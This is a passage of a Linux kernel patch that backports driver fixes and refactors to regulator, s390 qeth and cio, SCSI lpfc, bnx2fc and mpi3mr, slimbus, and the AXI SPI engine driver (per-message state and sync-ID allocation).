+ 			      buck_vout_ranges, 256, 0, buck1_irq_tbls),
+-	MT6360_REGULATOR_DESC(BUCK2, BUCK2_VIN, 0x127, 0x40, 0x120, 0xff, 0x127, 0x30, 0x127, 0x04,
++	MT6360_REGULATOR_DESC("buck2", BUCK2, BUCK2_VIN,
++			      0x127, 0x40, 0x120, 0xff, 0x127, 0x30, 0x127, 0x04,
+ 			      buck_vout_ranges, 256, 0, buck2_irq_tbls),
+-	MT6360_REGULATOR_DESC(LDO6, LDO_VIN3, 0x137, 0x40, 0x13B, 0xff, 0x137, 0x30, 0x137, 0x04,
++	MT6360_REGULATOR_DESC("ldo6", LDO6, LDO_VIN3,
++			      0x137, 0x40, 0x13B, 0xff, 0x137, 0x30, 0x137, 0x04,
+ 			      ldo_vout_ranges1, 256, 0, ldo6_irq_tbls),
+-	MT6360_REGULATOR_DESC(LDO7, LDO_VIN3, 0x131, 0x40, 0x135, 0xff, 0x131, 0x30, 0x131, 0x04,
++	MT6360_REGULATOR_DESC("ldo7", LDO7, LDO_VIN3,
++			      0x131, 0x40, 0x135, 0xff, 0x131, 0x30, 0x131, 0x04,
+ 			      ldo_vout_ranges1, 256, 0, ldo7_irq_tbls),
+-	MT6360_REGULATOR_DESC(LDO1, LDO_VIN1, 0x217, 0x40, 0x21B, 0xff, 0x217, 0x30, 0x217, 0x04,
++	MT6360_REGULATOR_DESC("ldo1", LDO1, LDO_VIN1,
++			      0x217, 0x40, 0x21B, 0xff, 0x217, 0x30, 0x217, 0x04,
+ 			      ldo_vout_ranges2, 256, 0, ldo1_irq_tbls),
+-	MT6360_REGULATOR_DESC(LDO2, LDO_VIN1, 0x211, 0x40, 0x215, 0xff, 0x211, 0x30, 0x211, 0x04,
++	MT6360_REGULATOR_DESC("ldo2", LDO2, LDO_VIN1,
++			      0x211, 0x40, 0x215, 0xff, 0x211, 0x30, 0x211, 0x04,
+ 			      ldo_vout_ranges2, 256, 0, ldo2_irq_tbls),
+-	MT6360_REGULATOR_DESC(LDO3, LDO_VIN1, 0x205, 0x40, 0x209, 0xff, 0x205, 0x30, 0x205, 0x04,
++	MT6360_REGULATOR_DESC("ldo3", LDO3, LDO_VIN1,
++			      0x205, 0x40, 0x209, 0xff, 0x205, 0x30, 0x205, 0x04,
+ 			      ldo_vout_ranges2, 256, 100, ldo3_irq_tbls),
+-	MT6360_REGULATOR_DESC(LDO5, LDO_VIN2, 0x20B, 0x40, 0x20F, 0x7f, 0x20B, 0x30, 0x20B, 0x04,
++	MT6360_REGULATOR_DESC("ldo5", LDO5, LDO_VIN2,
++			      0x20B, 0x40, 0x20F, 0x7f, 0x20B, 0x30, 0x20B, 0x04,
+ 			      ldo_vout_ranges3, 128, 100, ldo5_irq_tbls),
+ };
+ 
+diff --git a/drivers/s390/cio/cio_inject.c b/drivers/s390/cio/cio_inject.c
+index 8613fa937237b..a2e771ebae8eb 100644
+--- a/drivers/s390/cio/cio_inject.c
++++ b/drivers/s390/cio/cio_inject.c
+@@ -95,7 +95,7 @@ static ssize_t crw_inject_write(struct file *file, const char __user *buf,
+ 		return -EINVAL;
+ 	}
+ 
+-	buffer = vmemdup_user(buf, lbuf);
++	buffer = memdup_user_nul(buf, lbuf);
+ 	if (IS_ERR(buffer))
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/s390/net/qeth_core_main.c b/drivers/s390/net/qeth_core_main.c
+index 1e6340e2c2588..f99d1d325f3ea 100644
+--- a/drivers/s390/net/qeth_core_main.c
++++ b/drivers/s390/net/qeth_core_main.c
+@@ -364,30 +364,33 @@ static int qeth_cq_init(struct qeth_card *card)
+ 	return rc;
+ }
+ 
++static void qeth_free_cq(struct qeth_card *card)
++{
++	if (card->qdio.c_q) {
++		qeth_free_qdio_queue(card->qdio.c_q);
++		card->qdio.c_q = NULL;
++	}
++}
++
+ static int qeth_alloc_cq(struct qeth_card *card)
+ {
+ 	if (card->options.cq == QETH_CQ_ENABLED) {
+ 		QETH_CARD_TEXT(card, 2, "cqon");
+-		card->qdio.c_q = qeth_alloc_qdio_queue();
+ 		if (!card->qdio.c_q) {
+-			dev_err(&card->gdev->dev, "Failed to create completion queue\n");
+-			return -ENOMEM;
++			card->qdio.c_q = qeth_alloc_qdio_queue();
++			if (!card->qdio.c_q) {
++				dev_err(&card->gdev->dev,
++					"Failed to create completion queue\n");
++				return -ENOMEM;
++			}
+ 		}
+ 	} else {
+ 		QETH_CARD_TEXT(card, 2, "nocq");
+-		card->qdio.c_q = NULL;
++		qeth_free_cq(card);
+ 	}
+ 	return 0;
+ }
+ 
+-static void qeth_free_cq(struct qeth_card *card)
+-{
+-	if (card->qdio.c_q) {
+-		qeth_free_qdio_queue(card->qdio.c_q);
+-		card->qdio.c_q = NULL;
+-	}
+-}
+-
+ static enum iucv_tx_notify qeth_compute_cq_notification(int sbalf15,
+ 							int delayed)
+ {
+@@ -2628,6 +2631,10 @@ static int qeth_alloc_qdio_queues(struct qeth_card *card)
+ 
+ 	QETH_CARD_TEXT(card, 2, "allcqdbf");
+ 
++	/* completion */
++	if (qeth_alloc_cq(card))
++		goto out_err;
++
+ 	if (atomic_cmpxchg(&card->qdio.state, QETH_QDIO_UNINITIALIZED,
+ 		QETH_QDIO_ALLOCATED) != QETH_QDIO_UNINITIALIZED)
+ 		return 0;
+@@ -2663,10 +2670,6 @@ static int qeth_alloc_qdio_queues(struct qeth_card *card)
+ 		queue->priority = QETH_QIB_PQUE_PRIO_DEFAULT;
+ 	}
+ 
+-	/* completion */
+-	if (qeth_alloc_cq(card))
+-		goto out_freeoutq;
+-
+ 	return 0;
+ 
+ out_freeoutq:
+@@ -2677,6 +2680,8 @@ static int qeth_alloc_qdio_queues(struct qeth_card *card)
+ 	qeth_free_buffer_pool(card);
+ out_buffer_pool:
+ 	atomic_set(&card->qdio.state, QETH_QDIO_UNINITIALIZED);
++	qeth_free_cq(card);
++out_err:
+ 	return -ENOMEM;
+ }
+ 
+@@ -2684,11 +2689,12 @@ static void qeth_free_qdio_queues(struct qeth_card *card)
+ {
+ 	int i, j;
+ 
++	qeth_free_cq(card);
++
+ 	if (atomic_xchg(&card->qdio.state, QETH_QDIO_UNINITIALIZED) ==
+ 		QETH_QDIO_UNINITIALIZED)
+ 		return;
+ 
+-	qeth_free_cq(card);
+ 	for (j = 0; j < QDIO_MAX_BUFFERS_PER_Q; ++j) {
+ 		if (card->qdio.in_q->bufs[j].rx_skb) {
+ 			consume_skb(card->qdio.in_q->bufs[j].rx_skb);
+@@ -3740,24 +3746,11 @@ static void qeth_qdio_poll(struct ccw_device *cdev, unsigned long card_ptr)
+ 
+ int qeth_configure_cq(struct qeth_card *card, enum qeth_cq cq)
+ {
+-	int rc;
+-
+-	if (card->options.cq ==  QETH_CQ_NOTAVAILABLE) {
+-		rc = -1;
+-		goto out;
+-	} else {
+-		if (card->options.cq == cq) {
+-			rc = 0;
+-			goto out;
+-		}
+-
+-		qeth_free_qdio_queues(card);
+-		card->options.cq = cq;
+-		rc = 0;
+-	}
+-out:
+-	return rc;
++	if (card->options.cq == QETH_CQ_NOTAVAILABLE)
++		return -1;
+ 
++	card->options.cq = cq;
++	return 0;
+ }
+ EXPORT_SYMBOL_GPL(qeth_configure_cq);
+ 
+diff --git a/drivers/scsi/bnx2fc/bnx2fc_tgt.c b/drivers/scsi/bnx2fc/bnx2fc_tgt.c
+index 2c246e80c1c4d..d91659811eb3c 100644
+--- a/drivers/scsi/bnx2fc/bnx2fc_tgt.c
++++ b/drivers/scsi/bnx2fc/bnx2fc_tgt.c
+@@ -833,7 +833,6 @@ static void bnx2fc_free_session_resc(struct bnx2fc_hba *hba,
+ 
+ 	BNX2FC_TGT_DBG(tgt, "Freeing up session resources\n");
+ 
+-	spin_lock_bh(&tgt->cq_lock);
+ 	ctx_base_ptr = tgt->ctx_base;
+ 	tgt->ctx_base = NULL;
+ 
+@@ -889,7 +888,6 @@ static void bnx2fc_free_session_resc(struct bnx2fc_hba *hba,
+ 				    tgt->sq, tgt->sq_dma);
+ 		tgt->sq = NULL;
+ 	}
+-	spin_unlock_bh(&tgt->cq_lock);
+ 
+ 	if (ctx_base_ptr)
+ 		iounmap(ctx_base_ptr);
+diff --git a/drivers/scsi/lpfc/lpfc.h b/drivers/scsi/lpfc/lpfc.h
+index dc5ac3cc70f6d..6f08fbe103cb9 100644
+--- a/drivers/scsi/lpfc/lpfc.h
++++ b/drivers/scsi/lpfc/lpfc.h
+@@ -1355,7 +1355,6 @@ struct lpfc_hba {
+ 	struct timer_list fabric_block_timer;
+ 	unsigned long bit_flags;
+ 	atomic_t num_rsrc_err;
+-	atomic_t num_cmd_success;
+ 	unsigned long last_rsrc_error_time;
+ 	unsigned long last_ramp_down_time;
+ #ifdef CONFIG_SCSI_LPFC_DEBUG_FS
+diff --git a/drivers/scsi/lpfc/lpfc_els.c b/drivers/scsi/lpfc/lpfc_els.c
+index 6b5ce9869e6b4..05764008f6e70 100644
+--- a/drivers/scsi/lpfc/lpfc_els.c
++++ b/drivers/scsi/lpfc/lpfc_els.c
+@@ -4384,23 +4384,23 @@ lpfc_els_retry_delay(struct timer_list *t)
+ 	unsigned long flags;
+ 	struct lpfc_work_evt  *evtp = &ndlp->els_retry_evt;
+ 
++	/* Hold a node reference for outstanding queued work */
++	if (!lpfc_nlp_get(ndlp))
++		return;
++
+ 	spin_lock_irqsave(&phba->hbalock, flags);
+ 	if (!list_empty(&evtp->evt_listp)) {
+ 		spin_unlock_irqrestore(&phba->hbalock, flags);
++		lpfc_nlp_put(ndlp);
+ 		return;
+ 	}
+ 
+-	/* We need to hold the node by incrementing the reference
+-	 * count until the queued work is done
+-	 */
+-	evtp->evt_arg1  = lpfc_nlp_get(ndlp);
+-	if (evtp->evt_arg1) {
+-		evtp->evt = LPFC_EVT_ELS_RETRY;
+-		list_add_tail(&evtp->evt_listp, &phba->work_list);
+-		lpfc_worker_wake_up(phba);
+-	}
++	evtp->evt_arg1 = ndlp;
++	evtp->evt = LPFC_EVT_ELS_RETRY;
++	list_add_tail(&evtp->evt_listp, &phba->work_list);
+ 	spin_unlock_irqrestore(&phba->hbalock, flags);
+-	return;
++
++	lpfc_worker_wake_up(phba);
+ }
+ 
+ /**
+diff --git a/drivers/scsi/lpfc/lpfc_hbadisc.c b/drivers/scsi/lpfc/lpfc_hbadisc.c
+index 549fa7d6c0f6f..aaa98a006fdcb 100644
+--- a/drivers/scsi/lpfc/lpfc_hbadisc.c
++++ b/drivers/scsi/lpfc/lpfc_hbadisc.c
+@@ -241,7 +241,9 @@ lpfc_dev_loss_tmo_callbk(struct fc_rport *rport)
+ 		if (evtp->evt_arg1) {
+ 			evtp->evt = LPFC_EVT_DEV_LOSS;
+ 			list_add_tail(&evtp->evt_listp, &phba->work_list);
++			spin_unlock_irqrestore(&phba->hbalock, iflags);
+ 			lpfc_worker_wake_up(phba);
++			return;
+ 		}
+ 		spin_unlock_irqrestore(&phba->hbalock, iflags);
+ 	} else {
+@@ -259,10 +261,7 @@ lpfc_dev_loss_tmo_callbk(struct fc_rport *rport)
+ 			lpfc_disc_state_machine(vport, ndlp, NULL,
+ 						NLP_EVT_DEVICE_RM);
+ 		}
+-
+ 	}
+-
+-	return;
+ }
+ 
+ /**
+diff --git a/drivers/scsi/lpfc/lpfc_nvme.c b/drivers/scsi/lpfc/lpfc_nvme.c
+index 152245f7cacc7..7e9e0d969256a 100644
+--- a/drivers/scsi/lpfc/lpfc_nvme.c
++++ b/drivers/scsi/lpfc/lpfc_nvme.c
+@@ -2621,9 +2621,9 @@ lpfc_nvme_unregister_port(struct lpfc_vport *vport, struct lpfc_nodelist *ndlp)
+ 		/* No concern about the role change on the nvme remoteport.
+ 		 * The transport will update it.
+ 		 */
+-		spin_lock_irq(&vport->phba->hbalock);
++		spin_lock_irq(&ndlp->lock);
+ 		ndlp->fc4_xpt_flags |= NVME_XPT_UNREG_WAIT;
+-		spin_unlock_irq(&vport->phba->hbalock);
++		spin_unlock_irq(&ndlp->lock);
+ 
+ 		/* Don't let the host nvme transport keep sending keep-alives
+ 		 * on this remoteport. Vport is unloading, no recovery. The
+diff --git a/drivers/scsi/lpfc/lpfc_scsi.c b/drivers/scsi/lpfc/lpfc_scsi.c
+index 0bb7e164b525f..2a81a42de5c14 100644
+--- a/drivers/scsi/lpfc/lpfc_scsi.c
++++ b/drivers/scsi/lpfc/lpfc_scsi.c
+@@ -167,11 +167,10 @@ lpfc_ramp_down_queue_handler(struct lpfc_hba *phba)
+ 	struct Scsi_Host  *shost;
+ 	struct scsi_device *sdev;
+ 	unsigned long new_queue_depth;
+-	unsigned long num_rsrc_err, num_cmd_success;
++	unsigned long num_rsrc_err;
+ 	int i;
+ 
+ 	num_rsrc_err = atomic_read(&phba->num_rsrc_err);
+-	num_cmd_success = atomic_read(&phba->num_cmd_success);
+ 
+ 	/*
+ 	 * The error and success command counters are global per
+@@ -186,20 +185,16 @@ lpfc_ramp_down_queue_handler(struct lpfc_hba *phba)
+ 		for (i = 0; i <= phba->max_vports && vports[i] != NULL; i++) {
+ 			shost = lpfc_shost_from_vport(vports[i]);
+ 			shost_for_each_device(sdev, shost) {
+-				new_queue_depth =
+-					sdev->queue_depth * num_rsrc_err /
+-					(num_rsrc_err + num_cmd_success);
+-				if (!new_queue_depth)
+-					new_queue_depth = sdev->queue_depth - 1;
++				if (num_rsrc_err >= sdev->queue_depth)
++					new_queue_depth = 1;
+ 				else
+ 					new_queue_depth = sdev->queue_depth -
+-								new_queue_depth;
++						num_rsrc_err;
+ 				scsi_change_queue_depth(sdev, new_queue_depth);
+ 			}
+ 		}
+ 	lpfc_destroy_vport_work_array(phba, vports);
+ 	atomic_set(&phba->num_rsrc_err, 0);
+-	atomic_set(&phba->num_cmd_success, 0);
+ }
+ 
+ /**
+diff --git a/drivers/scsi/lpfc/lpfc_sli.c b/drivers/scsi/lpfc/lpfc_sli.c
+index 427a6ac803e50..47b8102a7063a 100644
+--- a/drivers/scsi/lpfc/lpfc_sli.c
++++ b/drivers/scsi/lpfc/lpfc_sli.c
+@@ -1217,9 +1217,9 @@ lpfc_set_rrq_active(struct lpfc_hba *phba, struct lpfc_nodelist *ndlp,
+ 	empty = list_empty(&phba->active_rrq_list);
+ 	list_add_tail(&rrq->list, &phba->active_rrq_list);
+ 	phba->hba_flag |= HBA_RRQ_ACTIVE;
++	spin_unlock_irqrestore(&phba->hbalock, iflags);
+ 	if (empty)
+ 		lpfc_worker_wake_up(phba);
+-	spin_unlock_irqrestore(&phba->hbalock, iflags);
+ 	return 0;
+ out:
+ 	spin_unlock_irqrestore(&phba->hbalock, iflags);
+@@ -11361,18 +11361,18 @@ lpfc_sli_post_recovery_event(struct lpfc_hba *phba,
+ 	unsigned long iflags;
+ 	struct lpfc_work_evt  *evtp = &ndlp->recovery_evt;
+ 
++	/* Hold a node reference for outstanding queued work */
++	if (!lpfc_nlp_get(ndlp))
++		return;
++
+ 	spin_lock_irqsave(&phba->hbalock, iflags);
+ 	if (!list_empty(&evtp->evt_listp)) {
+ 		spin_unlock_irqrestore(&phba->hbalock, iflags);
++		lpfc_nlp_put(ndlp);
+ 		return;
+ 	}
+ 
+-	/* Incrementing the reference count until the queued work is done. */
+-	evtp->evt_arg1  = lpfc_nlp_get(ndlp);
+-	if (!evtp->evt_arg1) {
+-		spin_unlock_irqrestore(&phba->hbalock, iflags);
+-		return;
+-	}
++	evtp->evt_arg1 = ndlp;
+ 	evtp->evt = LPFC_EVT_RECOVER_PORT;
+ 	list_add_tail(&evtp->evt_listp, &phba->work_list);
+ 	spin_unlock_irqrestore(&phba->hbalock, iflags);
+diff --git a/drivers/scsi/lpfc/lpfc_vport.c b/drivers/scsi/lpfc/lpfc_vport.c
+index 4d171f5c213f7..6b4259894584f 100644
+--- a/drivers/scsi/lpfc/lpfc_vport.c
++++ b/drivers/scsi/lpfc/lpfc_vport.c
+@@ -693,10 +693,6 @@ lpfc_vport_delete(struct fc_vport *fc_vport)
+ 	lpfc_free_sysfs_attr(vport);
+ 	lpfc_debugfs_terminate(vport);
+ 
+-	/* Remove FC host to break driver binding. */
+-	fc_remove_host(shost);
+-	scsi_remove_host(shost);
+-
+ 	/* Send the DA_ID and Fabric LOGO to cleanup Nameserver entries. */
+ 	ndlp = lpfc_findnode_did(vport, Fabric_DID);
+ 	if (!ndlp)
+@@ -740,6 +736,10 @@ lpfc_vport_delete(struct fc_vport *fc_vport)
+ 
+ skip_logo:
+ 
++	/* Remove FC host to break driver binding. */
++	fc_remove_host(shost);
++	scsi_remove_host(shost);
++
+ 	lpfc_cleanup(vport);
+ 
+ 	/* Remove scsi host now.  The nodes are cleaned up. */
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_app.c b/drivers/scsi/mpi3mr/mpi3mr_app.c
+index 8c662d08706f1..42600e5c457a1 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_app.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_app.c
+@@ -1344,7 +1344,7 @@ static long mpi3mr_bsg_process_mpt_cmds(struct bsg_job *job, unsigned int *reply
+ 	if ((mpirep_offset != 0xFF) &&
+ 	    drv_bufs[mpirep_offset].bsg_buf_len) {
+ 		drv_buf_iter = &drv_bufs[mpirep_offset];
+-		drv_buf_iter->kern_buf_len = (sizeof(*bsg_reply_buf) - 1 +
++		drv_buf_iter->kern_buf_len = (sizeof(*bsg_reply_buf) +
+ 					   mrioc->reply_sz);
+ 		bsg_reply_buf = kzalloc(drv_buf_iter->kern_buf_len, GFP_KERNEL);
+ 
+diff --git a/drivers/slimbus/qcom-ngd-ctrl.c b/drivers/slimbus/qcom-ngd-ctrl.c
+index 76c5e446d2433..da8555f3b6ca5 100644
+--- a/drivers/slimbus/qcom-ngd-ctrl.c
++++ b/drivers/slimbus/qcom-ngd-ctrl.c
+@@ -1376,7 +1376,11 @@ static void qcom_slim_ngd_up_worker(struct work_struct *work)
+ 	ctrl = container_of(work, struct qcom_slim_ngd_ctrl, ngd_up_work);
+ 
+ 	/* Make sure qmi service is up before continuing */
+-	wait_for_completion_interruptible(&ctrl->qmi_up);
++	if (!wait_for_completion_interruptible_timeout(&ctrl->qmi_up,
++						       msecs_to_jiffies(MSEC_PER_SEC))) {
++		dev_err(ctrl->dev, "QMI wait timeout\n");
++		return;
++	}
+ 
+ 	mutex_lock(&ctrl->ssr_lock);
+ 	qcom_slim_ngd_enable(ctrl, true);
+diff --git a/drivers/spi/spi-axi-spi-engine.c b/drivers/spi/spi-axi-spi-engine.c
+index 80c3e38f5c1b5..a5f0a61b266f1 100644
+--- a/drivers/spi/spi-axi-spi-engine.c
++++ b/drivers/spi/spi-axi-spi-engine.c
+@@ -6,6 +6,8 @@
+  */
+ 
+ #include <linux/clk.h>
++#include <linux/fpga/adi-axi-common.h>
++#include <linux/idr.h>
+ #include <linux/interrupt.h>
+ #include <linux/io.h>
+ #include <linux/of.h>
+@@ -13,12 +15,6 @@
+ #include <linux/platform_device.h>
+ #include <linux/spi/spi.h>
+ 
+-#define SPI_ENGINE_VERSION_MAJOR(x)	((x >> 16) & 0xff)
+-#define SPI_ENGINE_VERSION_MINOR(x)	((x >> 8) & 0xff)
+-#define SPI_ENGINE_VERSION_PATCH(x)	(x & 0xff)
+-
+-#define SPI_ENGINE_REG_VERSION			0x00
+-
+ #define SPI_ENGINE_REG_RESET			0x40
+ 
+ #define SPI_ENGINE_REG_INT_ENABLE		0x80
+@@ -78,28 +74,42 @@ struct spi_engine_program {
+ 	uint16_t instructions[];
+ };
+ 
+-struct spi_engine {
+-	struct clk *clk;
+-	struct clk *ref_clk;
+-
+-	spinlock_t lock;
+-
+-	void __iomem *base;
+-
+-	struct spi_message *msg;
++/**
++ * struct spi_engine_message_state - SPI engine per-message state
++ */
++struct spi_engine_message_state {
++	/** Instructions for executing this message. */
+ 	struct spi_engine_program *p;
++	/** Number of elements in cmd_buf array. */
+ 	unsigned cmd_length;
++	/** Array of commands not yet written to CMD FIFO. */
+ 	const uint16_t *cmd_buf;
+-
++	/** Next xfer with tx_buf not yet fully written to TX FIFO. */
+ 	struct spi_transfer *tx_xfer;
++	/** Size of tx_buf in bytes. */
+ 	unsigned int tx_length;
++	/** Bytes not yet written to TX FIFO. */
+ 	const uint8_t *tx_buf;
+-
++	/** Next xfer with rx_buf not yet fully written to RX FIFO. */
+ 	struct spi_transfer *rx_xfer;
++	/** Size of tx_buf in bytes. */
+ 	unsigned int rx_length;
++	/** Bytes not yet written to the RX FIFO. */
+ 	uint8_t *rx_buf;
++	/** ID to correlate SYNC interrupts with this message. */
++	u8 sync_id;
++};
++
++struct spi_engine {
++	struct clk *clk;
++	struct clk *ref_clk;
++
++	spinlock_t lock;
+ 
+-	unsigned int sync_id;
++	void __iomem *base;
++
++	struct spi_message *msg;
++	struct ida sync_ida;
+ 	unsigned int completed_id;
+ 
+ 	unsigned int int_enable;
+@@ -258,106 +268,111 @@ static void spi_engine_xfer_next(struct spi_engine *spi_engine,
+ 
+ static void spi_engine_tx_next(struct spi_engine *spi_engine)
+ {
+-	struct spi_transfer *xfer = spi_engine->tx_xfer;
++	struct spi_engine_message_state *st = spi_engine->msg->state;
++	struct spi_transfer *xfer = st->tx_xfer;
+ 
+ 	do {
+ 		spi_engine_xfer_next(spi_engine, &xfer);
+ 	} while (xfer && !xfer->tx_buf);
+ 
+-	spi_engine->tx_xfer = xfer;
++	st->tx_xfer = xfer;
+ 	if (xfer) {
+-		spi_engine->tx_length = xfer->len;
+-		spi_engine->tx_buf = xfer->tx_buf;
++		st->tx_length = xfer->len;
++		st->tx_buf = xfer->tx_buf;
+ 	} else {
+-		spi_engine->tx_buf = NULL;
++		st->tx_buf = NULL;
+ 	}
+ }
+ 
+ static void spi_engine_rx_next(struct spi_engine *spi_engine)
+ {
+-	struct spi_transfer *xfer = spi_engine->rx_xfer;
++	struct spi_engine_message_state *st = spi_engine->msg->state;
++	struct spi_transfer *xfer = st->rx_xfer;
+ 
+ 	do {
+ 		spi_engine_xfer_next(spi_engine, &xfer);
+ 	} while (xfer && !xfer->rx_buf);
+ 
+-	spi_engine->rx_xfer = xfer;
++	st->rx_xfer = xfer;
+ 	if (xfer) {
+-		spi_engine->rx_length = xfer->len;
+-		spi_engine->rx_buf = xfer->rx_buf;
++		st->rx_length = xfer->len;
++		st->rx_buf = xfer->rx_buf;
+ 	} else {
+-		spi_engine->rx_buf = NULL;
++		st->rx_buf = NULL;
+ 	}
+ }
+ 
+ static bool spi_engine_write_cmd_fifo(struct spi_engine *spi_engine)
+ {
+ 	void __iomem *addr = spi_engine->base + SPI_ENGINE_REG_CMD_FIFO;
++	struct spi_engine_message_state *st = spi_engine->msg->state;
+ 	unsigned int n, m, i;
+ 	const uint16_t *buf;
+ 
+ 	n = readl_relaxed(spi_engine->base + SPI_ENGINE_REG_CMD_FIFO_ROOM);
+-	while (n && spi_engine->cmd_length) {
+-		m = min(n, spi_engine->cmd_length);
+-		buf = spi_engine->cmd_buf;
++	while (n && st->cmd_length) {
++		m = min(n, st->cmd_length);
++		buf = st->cmd_buf;
+ 		for (i = 0; i < m; i++)
+ 			writel_relaxed(buf[i], addr);
+-		spi_engine->cmd_buf += m;
+-		spi_engine->cmd_length -= m;
++		st->cmd_buf += m;
++		st->cmd_length -= m;
+ 		n -= m;
+ 	}
+ 
+-	return spi_engine->cmd_length != 0;
++	return st->cmd_length != 0;
+ }
+ 
+ static bool spi_engine_write_tx_fifo(struct spi_engine *spi_engine)
+ {
+ 	void __iomem *addr = spi_engine->base + SPI_ENGINE_REG_SDO_DATA_FIFO;
++	struct spi_engine_message_state *st = spi_engine->msg->state;
+ 	unsigned int n, m, i;
+ 	const uint8_t *buf;
+ 
+ 	n = readl_relaxed(spi_engine->base + SPI_ENGINE_REG_SDO_FIFO_ROOM);
+-	while (n && spi_engine->tx_length) {
+-		m = min(n, spi_engine->tx_length);
+-		buf = spi_engine->tx_buf;
++	while (n && st->tx_length) {
++		m = min(n, st->tx_length);
++		buf = st->tx_buf;
+ 		for (i = 0; i < m; i++)
+ 			writel_relaxed(buf[i], addr);
+-		spi_engine->tx_buf += m;
+-		spi_engine->tx_length -= m;
++		st->tx_buf += m;
++		st->tx_length -= m;
+ 		n -= m;
+-		if (spi_engine->tx_length == 0)
++		if (st->tx_length == 0)
+ 			spi_engine_tx_next(spi_engine);
+ 	}
+ 
+-	return spi_engine->tx_length != 0;
++	return st->tx_length != 0;
+ }
+ 
+ static bool spi_engine_read_rx_fifo(struct spi_engine *spi_engine)
+ {
+ 	void __iomem *addr = spi_engine->base + SPI_ENGINE_REG_SDI_DATA_FIFO;
++	struct spi_engine_message_state *st = spi_engine->msg->state;
+ 	unsigned int n, m, i;
+ 	uint8_t *buf;
+ 
+ 	n = readl_relaxed(spi_engine->base + SPI_ENGINE_REG_SDI_FIFO_LEVEL);
+-	while (n && spi_engine->rx_length) {
+-		m = min(n, spi_engine->rx_length);
+-		buf = spi_engine->rx_buf;
++	while (n && st->rx_length) {
++		m = min(n, st->rx_length);
++		buf = st->rx_buf;
+ 		for (i = 0; i < m; i++)
+ 			buf[i] = readl_relaxed(addr);
+-		spi_engine->rx_buf += m;
+-		spi_engine->rx_length -= m;
++		st->rx_buf += m;
++		st->rx_length -= m;
+ 		n -= m;
+-		if (spi_engine->rx_length == 0)
++		if (st->rx_length == 0)
+ 			spi_engine_rx_next(spi_engine);
+ 	}
+ 
+-	return spi_engine->rx_length != 0;
++	return st->rx_length != 0;
+ }
+ 
+ static irqreturn_t spi_engine_irq(int irq, void *devid)
+ {
+-	struct spi_master *master = devid;
+-	struct spi_engine *spi_engine = spi_master_get_devdata(master);
++	struct spi_controller *host = devid;
++	struct spi_engine *spi_engine = spi_controller_get_devdata(host);
+ 	unsigned int disable_int = 0;
+ 	unsigned int pending;
+ 
+@@ -387,16 +402,20 @@ static irqreturn_t spi_engine_irq(int irq, void *devid)
+ 			disable_int |= SPI_ENGINE_INT_SDI_ALMOST_FULL;
+ 	}
+ 
+-	if (pending & SPI_ENGINE_INT_SYNC) {
+-		if (spi_engine->msg &&
+-		    spi_engine->completed_id == spi_engine->sync_id) {
++	if (pending & SPI_ENGINE_INT_SYNC && spi_engine->msg) {
++		struct spi_engine_message_state *st = spi_engine->msg->state;
++
++		if (spi_engine->completed_id == st->sync_id) {
+ 			struct spi_message *msg = spi_engine->msg;
++			struct spi_engine_message_state *st = msg->state;
+ 
+-			kfree(spi_engine->p);
++			ida_free(&spi_engine->sync_ida, st->sync_id);
++			kfree(st->p);
++			kfree(st);
+ 			msg->status = 0;
+ 			msg->actual_length = msg->frame_length;
+ 			spi_engine->msg = NULL;
+-			spi_finalize_current_message(master);
++			spi_finalize_current_message(host);
+ 			disable_int |= SPI_ENGINE_INT_SYNC;
+ 		}
+ 	}
+@@ -412,34 +431,51 @@ static irqreturn_t spi_engine_irq(int irq, void *devid)
+ 	return IRQ_HANDLED;
+ }
+ 
+-static int spi_engine_transfer_one_message(struct spi_master *master,
++static int spi_engine_transfer_one_message(struct spi_controller *host,
+ 	struct spi_message *msg)
+ {
+ 	struct spi_engine_program p_dry, *p;
+-	struct spi_engine *spi_engine = spi_master_get_devdata(master);
++	struct spi_engine *spi_engine = spi_controller_get_devdata(host);
++	struct spi_engine_message_state *st;
+ 	unsigned int int_enable = 0;
+ 	unsigned long flags;
+ 	size_t size;
++	int ret;
++
++	st = kzalloc(sizeof(*st), GFP_KERNEL);
++	if (!st)
++		return -ENOMEM;
+ 
+ 	p_dry.length = 0;
+ 	spi_engine_compile_message(spi_engine, msg, true, &p_dry);
+ 
+ 	size = sizeof(*p->instructions) * (p_dry.length + 1);
+ 	p = kzalloc(sizeof(*p) + size, GFP_KERNEL);
+-	if (!p)
++	if (!p) {
++		kfree(st);
+ 		return -ENOMEM;
++	}
++
++	ret = ida_alloc_range(&spi_engine->sync_ida, 0, U8_MAX, GFP_KERNEL);
++	if (ret < 0) {
++		kfree(p);
++		kfree(st);
++		return ret;
++	}
++
++	st->sync_id = ret;
++
+ 	spi_engine_compile_message(spi_engine, msg, false, p);
+ 
+ 	spin_lock_irqsave(&spi_engine->lock, flags);
+-	spi_engine->sync_id = (spi_engine->sync_id + 1) & 0xff;
+-	spi_engine_program_add_cmd(p, false,
+-		SPI_ENGINE_CMD_SYNC(spi_engine->sync_id));
++	spi_engine_program_add_cmd(p, false, SPI_ENGINE_CMD_SYNC(st->sync_id));
+ 
++	msg->state = st;
+ 	spi_engine->msg = msg;
+-	spi_engine->p = p;
++	st->p = p;
+ 
+-	spi_engine->cmd_buf = p->instructions;
+-	spi_engine->cmd_length = p->length;
++	st->cmd_buf = p->instructions;
++	st->cmd_length = p->length;
+ 	if (spi_engine_write_cmd_fifo(spi_engine))
+ 		int_enable |= SPI_ENGINE_INT_CMD_ALMOST_EMPTY;
+ 
+@@ -448,7 +484,7 @@ static int spi_engine_transfer_one_message(struct spi_master *master,
+ 		int_enable |= SPI_ENGINE_INT_SDO_ALMOST_EMPTY;
+ 
+ 	spi_engine_rx_next(spi_engine);
+-	if (spi_engine->rx_length != 0)
++	if (st->rx_length != 0)
+ 		int_enable |= SPI_ENGINE_INT_SDI_ALMOST_FULL;
+ 
+ 	int_enable |= SPI_ENGINE_INT_SYNC;
+@@ -464,7 +500,7 @@ static int spi_engine_transfer_one_message(struct spi_master *master,
+ static int spi_engine_probe(struct platform_device *pdev)
+ {
+ 	struct spi_engine *spi_engine;
+-	struct spi_master *master;
++	struct spi_controller *host;
+ 	unsigned int version;
+ 	int irq;
+ 	int ret;
+@@ -473,107 +509,76 @@ static int spi_engine_probe(struct platform_device *pdev)
+ 	if (irq <= 0)
+ 		return -ENXIO;
+ 
